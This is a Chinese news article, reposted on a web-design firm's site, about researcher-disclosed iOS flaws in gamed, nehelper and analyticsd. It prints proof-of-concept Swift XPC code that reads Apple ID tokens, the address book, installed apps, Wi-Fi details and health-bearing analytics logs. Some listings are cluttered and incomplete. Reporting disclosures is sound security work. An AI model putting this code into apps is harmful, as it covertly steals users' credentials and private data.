研究人员发现三个iOS0day漏洞PoC代码

[[425782]]

成都网站建设、做网站,成都做网站公司-创新互联建站已向成百上千家企业提供了,网站设计,网站制作,网络营销等服务!设计与技术结合,多年网站推广经验,合理的价格为您打造企业品质网站。

研究人员发现3个iOS 0 day漏洞PoC代码。

GitHub用户illusionofchaos在GitHub上发布了4个iOS 安全漏洞的PoC代码,其中包含3个0 day漏洞和1个已修复的安全漏洞。这4个漏洞分别是:

  • Gamed 0-day
  • Nehelper Enumerate Installed Apps 0-day
  • Nehelper Wifi Info 0-day
  • Analyticsd (iOS 14.7中已修复)

Gamed 0-day

从APP store中按住那个的应用可以在用户不知情的情况下访问以下信息:

  • Apple ID邮箱和Apple ID账户的全名;
  • Apple ID认证token,允许以用户名义访问*.apple.com上的至少1个终端;
  • Core Duet数据库的完全文件系统读权限,其中包含邮箱、SMS、iMessage和第3方消息APP的联系人,以及与这些联系人进行用户交互的元数据;
  • 快速拨号数据库和地址簿数据库的完全文件系统读权限,包括联系人图片和其他元数据;

PoC代码如下:

  
 
 
    
   
  
  
  1. let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)! 
    2.    
  
  
  2. let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol 
    3.    
  
  
  3. let pid = ProcessInfo.processInfo.processIdentifier 
    4.    
  
  
  4. proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in 
    5.    
  
  
  5.     accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in 
    6.    
  
  
  6.         let appleID = response.credential.accountName 
    7.    
  
  
  7.         let token = response.credential.authenticationToken 
    8.    
  
  
  8.     } 
    9.    
  
  
  9.     utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in 
    10.    
  
  
  10.         let addressBookData = data 
    11.    
  
  
  11.     } 
    12.    
  
  
    13.

Nehelper Enumerate Installed Apps 0-day

该漏洞允许任何用户安装的APP来确定设备上安装的APP是否是给定的bundle ID。XPC终端com.apple.nehelper 有一个访问APP的方法可以接受bundle ID作为参数,并返回含有缓存UUID的数组,缓存的UUID可以用来与设备上安装的应用的bundle ID进行配对。具体参见/usr/libexec/nehelper的[NEHelperCacheManager onQueueHandleMessage:] :

  
 
 
    
   
  
  
  1. func isAppInstalled(bundleId: String) -> Bool { 
    2.    
  
  
  2.     let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)! 
    3.    
  
  
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
    4.    
  
  
  4.     xpc_connection_resume(connection) 
    5.    
  
  
  5.     let xdict = xpc_dictionary_create(nil, nil, 0) 
    6.    
  
  
  6.     xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1) 
    7.    
  
  
  7.     xpc_dictionary_set_uint64(xdict, "cache-command", 3) 
    8.    
  
  
  8.     xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId) 
    9.    
  
  
  9.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) 
    10.    
  
  
  10.     if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil { 
    11.    
  
  
  11.         return true 
    12.    
  
  
  12.     } 
    13.    
  
  
  13.     return false 
    14.    
  
  
    15.

Nehelper Wifi Info 0-day

XPC终端com.apple.nehelper会接收用户提供的参数sdk-version,如果该值小于后等于524288,com.apple.developer.networking.wifi-info entiltlement就会跳过。这使得任何符合条件的APP都可以在无需entiltlement的情况下获取WiFi信息。

  
 
 
    
   
  
  
  1. func wifi_info() -> String? { 
    2.    
  
  
  2.     let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2) 
    3.    
  
  
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
    4.    
  
  
  4.     xpc_connection_resume(connection) 
    5.    
  
  
  5.     let xdict = xpc_dictionary_create(nil, nil, 0) 
    6.    
  
  
  6.     xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10) 
    7.    
  
  
  7.     xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely 
    8.    
  
  
  8.     xpc_dictionary_set_string(xdict, "interface-name", "en0") 
    9.    
  
  
  9.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) 
    10.    
  
  
  10.     if let result = xpc_dictionary_get_value(reply, "result-data") { 
    11.    
  
  
  11.         let ssid = String(cString: xpc_dictionary_get_string(result, "SSID")) 
    12.    
  
  
  12.         let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID")) 
    13.    
  
  
  13.         return "SSID: \(ssid)\nBSSID: \(bssid)" 
    14.    
  
  
  14.     } else { 
    15.    
  
  
  15.         return nil 
    16.    
  
  
  16.     } 
    17.    
  
  
    18.

Analyticsd (iOS 14.7中已修复)

该漏洞允许任意用户安装的APP访问分析日志。这些日志中含有以下信息:

  • 医疗信息,包括心跳、异常心律事件等;
  • 设备使用信息,包括推送通知数和用户的行为等;
  • 屏幕时间信息和给定bundle ID的所有有用的会话数;
  • Safari中用户查看的web页面的语言;
  • 设备配件的信息,包括厂商、型号、固件版本和用户分配的名字;
  
 
 
    
   
  
  
  1. func analytics_json() -> String? { 
    2.    
  
  
  2. let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2) 
    3.    
  
  
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
    4.    
  
  
  4.     xpc_connection_resume(connection) 
    5.    
  
  
  5. let xdict = xpc_dictionary_create(nil, nil, 0) 
    6.    
  
  
  6.     xpc_dictionary_set_string(xdict, "command", "log-dump"); 
    7.    
  
  
  7.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict); 
    8.    
  
  
  8.     return xpc_dictionary_get_string(reply, "log-dump"); 
    9.    
  
  
    10.

更多参见:https://habr.com/ru/post/579714/

 

网站标题:研究人员发现三个iOS0day漏洞PoC代码
地址分享:http://www.shufengxianlan.com/qtweb/news34/255084.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

用户体验知识

分类信息网

app软件定制开发    电子商务商城网站    成都网站优化    力比特工程    响应式网站    物流公司网站建设方案    内江网站建设    传美奇电气    营销网站建设    大足网站建设    成都网络营销    香港主机    护栏打桩机    手机APP开发    网站开发    品牌网站建设公司    四川鸿达    网站SEO优化    成都网站设计公司    租用服务器